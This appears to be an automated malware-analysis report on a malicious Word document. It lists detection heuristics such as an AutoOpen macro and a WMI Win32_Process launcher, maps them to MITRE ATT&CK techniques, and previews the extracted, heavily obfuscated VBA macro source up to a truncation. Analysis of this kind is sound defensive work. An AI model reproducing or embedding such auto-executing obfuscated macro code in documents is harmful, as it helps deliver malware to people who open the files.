MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1190 Exploit Public-Facing Application
The file contains a critical heuristic firing for VBA WMI Win32_Process launcher, indicating the VBA macro attempts to execute a process via WMI. The presence of an AutoOpen macro and legacy WordBasic markers further suggests malicious intent. The script's obfuscated nature and lack of clear indicators for a specific family lead to an 'unknown family' classification.
Heuristics 8
-
ClamAV: Doc.Malware.Sagent-6941569-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-6941569-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58644 bytes |
SHA-256: 5ec2e7ec9f89835f25bd6e626bbe9942384bfce1652df0c82a2533a074c7439f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "RABBAAU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ZADAB4AQ"
Attribute VB_Base = "0{98AA738E-8DCC-40F6-968A-606F76234379}{E1F289D6-B007-4E6C-8FDB-6E4523011A5F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "bQxDDA"
Attribute VB_Base = "0{5BF04F59-34A9-4787-A884-216B16A4E79B}{028B6BD1-D077-445E-8D93-3E65E3422A17}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "DGXUACA"
Sub autoopen()
If XDQoD_ = rQwoAAA Then
Select Case uGcCcXU
Case 412484586
I1U4AG = 531440149
mAGwAcAB = hAAAZA
FZAA_AD = Asc(387780501 + Log(268599846 - Rnd(DXX4xABw)) / 427752754 + Oct(717735401))
Case 976129143
o1GXA_X = JAUABAA
kQAQC_1U = BAQkABUX
iAA4Ux = CDate(776495311 - Cos(879223162 * Rnd(225647713) + 54910069 * 222724604) * r11AwDw / Round(899741393))
Case 326242996
QAU11w = rGwAo1
jAXkAGQC = CStr(858213074)
IBB1AZ = Atn(667093089 + Atn(303481066) * ZBcoDZA * CDate(VAUAB_A + 36 + j1_AADx / CStr(UAUXcXAX)))
End Select
End If
If LAQBUAAZ = wAGAD1B Then
Select Case sQAADkC
Case 84677044
zAxX1ZA1 = 658719516
qAk1AACQ = XoAD1cA_
mQQQACBD = Asc(931731990 + Log(897995842 - Rnd(ZQAokQ1U)) / 3788671 + Oct(538819238))
Case 88761606
WBAxQAA = AAk4CB
fUBQDUA = UXDAXUAA
BDUAXx = CDate(264814098 - Cos(769216138 * Rnd(180297) + 755663669 * 530305566) * aAAGAcA / Round(456096298))
Case 498573554
s4BZAAGQ = swwAAQk4
QAQBAAx = CStr(188419521)
hQAGQBAQ = Atn(948971452 + Atn(656060709) * bGGXUC4_ * CDate(JCDABUAQ + 36 + ZwkA_QC / CStr(RGGBA1)))
End Select
End If
If TBUAAZ = iDAAw_1A Then
Select Case GAQAAAAc
Case 953039793
SBAAGQxA = 92290036
t1AQQAZ = CowcDQAA
hQDcwZA = Asc(893219596 + Log(571779121 - Rnd(bBZGAZ)) / 372244 + Oct(408448808))
Case 4093032
TUA_41A = FBGBAZ1A
cAGQZA = KAAZoA
zXAoDc = CDate(443886480 - Cos(120686030 * Rnd(153428062) + 695824283 * 166147075) * iXBUoCBU / Round(863695897))
Case 285231789
wUDA4CAG = FGAQB_Q
tDQQBAkx = CStr(994343949)
GAAcU1D = Atn(56046593 + Atn(563662184) * wxADAwk * CDate(IZ_BAA + 36 + v_AAkA / CStr(SADAkZ)))
End Select
End If
CxQcUZA
If uAxADcBA = McQAoA Then
Select Case GkU4Ux
Case 104975783
lA4ZkA1 = 725148149
LABAcCA1 = v1A4AAAA
ACA4BA = Asc(330709001 + Log(773993732 - Rnd(MDc1AAQZ)) / 426081966 + Oct(646181733))
Case 226174800
A_AAx4AD = hAAxcAA
JBBBAZA = ioGA1AAk
QA1QAG = CDate(327090497 - Cos(567849335 * Rnd(79000618) + 792454684 * 557286600) * BBQkAAk / Round(320938827))
Case 772409821
ZDQ4_x = UZ1wAQAX
I1wA1AXA = CStr(131211332)
PxQAw1A = Atn(899991348 + Atn(721291585) * CG1kA4 * CDate(E_kU4wB + 36 + GUAoAUD_ / CStr(j_AAABD)))
End Select
End If
If EDAA4BA = AXBAAGAc Then
Select Case BAAXcoA
Case 158165350
pAGABX = 816896992
kkACAA = r1AXxD
ZAo1UUU = Asc(82172726 + Log(52699891 - Rnd(aAoooxAZ)) / 268907725 + Oct(785052912))
Case 964769127
nUDBxxQA = DBAAGx
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.